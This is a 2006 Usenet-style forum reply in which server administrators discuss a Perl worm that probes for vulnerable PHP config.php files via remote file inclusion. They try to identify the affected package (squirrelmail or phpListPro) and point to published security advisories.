Re: PHP/Perl/Unix Virus: delete config.php files asap

On Wed, 30 Aug 2006 19:45:54 GMT, Colin McKinnon <colin.thisisnotmysurname@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx> wrote:
Ignoramus6539 wrote:

There were some strange requests to my server asking for config.php
file (which I do not have in the requested location).


Nice one Ignoramus6539

I did some investigation. Seems to be a virus written in perl,
exploiting a vulnerability in php code.


Sure looks like it. Is anyone daft enough to include($get_parameter)?

I think that the get parameter was mentioned in the access_log line.

I did a locate command on my fedora systems and found config.php in
some package called 'squirrelmail'. Which I immediately deleted, even
though it was not accessible through the web, just sitting there, but
I just do not want it.

Oooh. "Some package called...' sloppy housekeeping!

Yep. Point taken.

Actually, although Squirrelmail was vulnerable to this kind of attack
(http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
the developers are relatively good about releasing fixes.

Your attacker seems to be looking for phpListPro
(http://www.frsirt.com/english/advisories/2006/1325).

Usually script kiddies don't look to see what you're running before
unleashing all their dogs on your servers.

Absolutely. They probably googled for some keywords on phpListPro and
found them under /algebra/about/history/ directory.

My main question is, just what package or program owns config.php that
si vulnerable. It is a generic file name, so I would not be so quick
to suspect squirrelmail.

Next time try Google first :) and give us a URL for the code.

Well, I thought that the URLs might disappear soon. If you would like
me to place code on my own webpage, I will be glad to do so.

i

.

Relevant Pages